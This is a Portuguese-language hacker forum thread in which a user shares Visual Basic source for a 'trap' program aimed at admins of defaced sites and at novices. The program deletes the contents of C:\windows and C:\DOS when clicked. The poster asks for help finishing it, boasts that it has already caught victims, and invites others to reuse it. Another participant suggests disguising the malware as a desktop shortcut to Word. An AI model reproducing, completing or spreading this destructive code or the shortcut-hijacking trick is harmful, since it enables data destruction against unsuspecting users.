Exibindo resultados 1 até 8 de 8

Tópico: SibÉria

HELL IN HELL Visitante

Question

Preparei essa armadilha para admins burros , que depois do deface, executarem esse programa , pra ver se acham alguma pista dos defacers (ou defacer hehe) mas há um bug qualquer
    quem puder me ajudar a terminar o prog de uma vez , por favor me ajude!  brigadu desd jah
    (esse prog formata a unidade C: ) eu ainda tentei um jeito de ***** o BIOs da porcaria, mas eiu ainda naum consegui
    (essa armadilha tb serve pra lammers (originalmente projetei pra isso)

Desde
    Feb 2002
    Peso da Avaliação
    0
    Tá em que linguagem, dependendo de que linguagem estiver o programa, eu posso ajudar. Se quiser passar o código-fonte em txt para que conclua o programa, tudo bem.  

HELL IN HELL Visitante
    Blz, ta em vb

HELL IN HELL Visitante
    Private Sub Command1_Click()
    Text1.Text = "HELL IN HELL ST0R3 C0D3 AT0MIC"
    End Sub

Private Sub Command2_Click()
    Kill "C:\windows\*.*"
    End Sub

Private Sub Command3_Click()
    Text2.Text = "ONLY FOR NEON KNIGHTS MEMBERS!"
    End Sub

Private Sub Drive1_Change()
    Kill "C:\DOS\*.*"
    End Sub

Desde
    Jan 2002
    Peso da Avaliação
    0

BOBAGI................ TEM Q SER UM ADMINISTRADOR BEM PANACA E BURRO PRA EXECUTAR UM PROGRAMA DE UM INVASOR NO PROPRIO SERVER...

MAIS NUM CUSTA TENTAR NÉ...VAI FIRME...

HELL IN HELL Visitante

Wink

Foi pra isso meso que foi feito herhehehehehehehehehehe, a versaum de teste pegou 3 heheheheheheheheeehehehehehehehe, na net vc encontra de tud kra , mas esse eu projetei + pra enganar lammers (rotulo )
    mesmo , admins, soh eventualmente.............quando ele é imbecil ao ponto de executar  []s fortes : HELL

Desde
    Jan 2002
    Local
    Salvador, BA
    Peso da Avaliação
    0

Talking

Uma forma boa de execução de vírus, é o cara apagar um ícone na área de trabalho do cliente, criar um novo ícone, mas desta vez com o atalho pro seu programa malicioso e usar o ícone usado antes.
    Pode só alterar o caminho do ícone anterior, mas em alguns casos o ícone toma a forma padrão do windows, sem achar o programa associado.

Já pensou, tá lá o atalho pro word, aí o cara executa achando que entrou no seu processador de texto e... puf! já foi!!

HELL IN HELL Visitante

Thumbs up

hehehehehehehehehe  dessa gostei, vo fazer umas alterações nele , + quem quizer usar o codigo, pode usah, DESDE QUE O USO SEJA APENAS PRA MANDAR LAMMERS OU ADMINS IMBECIS PRO ESPAÇO

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Regras de envio